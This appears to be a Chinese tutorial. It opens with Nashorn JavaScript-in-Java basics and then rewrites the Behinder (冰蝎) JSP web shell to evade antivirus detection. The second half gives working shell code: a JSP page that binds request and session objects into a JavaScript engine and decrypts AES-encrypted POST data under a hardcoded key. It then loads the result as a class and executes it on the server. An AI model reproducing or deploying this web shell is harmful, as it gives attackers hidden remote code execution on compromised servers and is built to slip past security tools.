load("nashorn:mozilla_compat.js"); importPackage(java.util); var list = new ArrayList();
JavaImporter:主要针对类型冲突的情况,配合with限定作用域
1 2 3 4 5 6 7 8 9
var SwingGui = new JavaImporter(javax.swing, javax.swing.event, javax.swing.border, java.awt.event); with (SwingGui) { // 在with里面才可以调用swing里面的类,防止污染 var mybutton = new JButton("test"); var myframe = new JFrame("test"); }
var System = Java.type('java.lang.System'); System.out.println('Hello, World'); // Hello, World System.out['println']('Hello, World'); // Hello, World System.out['println(int)'](3.14); // 3 System.out['println(double)'](3.14); // 3.14
改写冰蝎免杀shell
预处理绑定对象
根据冰蝎的一句话shell,在java代码的部分,我们需要预处理绑定一些对象
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
<%@pageimport="javax.script.*"%> <%!classUextendsClassLoader{ U(ClassLoader c){ super(c) ;} public Class g(byte []b){ returnsuper.defineClass(b,0,b.length);} }%> <% ScriptEngine engine=new ScriptEngineManager().getEngineByName("js"); engine.put("request", request); engine.put("response", response); engine.put("session", session); engine.put("pageContext", pageContext); engine.put("U", new U(this.getClass().getClassLoader())); //为什么仍然需要自定义一个U对象,后面会说 engine.eval("xxx"); %>
function define(classBytes){ var defineClassMethod = U.getClass().getDeclaredMethod("g",classBytes.getClass()); defineClassMethod.setAccessible(true); var cc = defineClassMethod.invoke(U,new Array(classBytes)); cc.newInstance().equals(pageContext); }
照搬一下剩下的部分(改为js的语法即可)
1 2 3 4 5 6 7
if (request.getMethod().equals("POST")){ var k = new java.lang.String("e45e329feb5d925b"); session.putValue("u",k); var c = Cipher.getInstance("AES"); c.init(2,new SecretKeySpec(k.getBytes(),"AES")); define(c.doFinal(new BASE64Decoder().decodeBuffer(request.getReader().readLine()))); }
try { load("nashorn:mozilla_compat.js"); } catch (e) {} importPackage(Packages.java.util); importPackage(Packages.java.lang); importPackage(Packages.javax.crypto); importPackage(Packages.sun.misc); importPackage(Packages.javax.crypto.spec); function define(classBytes){ var defineClassMethod = U.getClass().getDeclaredMethod("g",classBytes.getClass()); defineClassMethod.setAccessible(true); var cc = defineClassMethod.invoke(U,new Array(classBytes)); cc.newInstance().equals(pageContext); } if (request.getMethod().equals("POST")){ var k = new java.lang.String("e45e329feb5d925b"); session.putValue("u",k); var c = Cipher.getInstance("AES"); c.init(2,new SecretKeySpec(k.getBytes(),"AES")); define(c.doFinal(new BASE64Decoder().decodeBuffer(request.getReader().readLine()))); }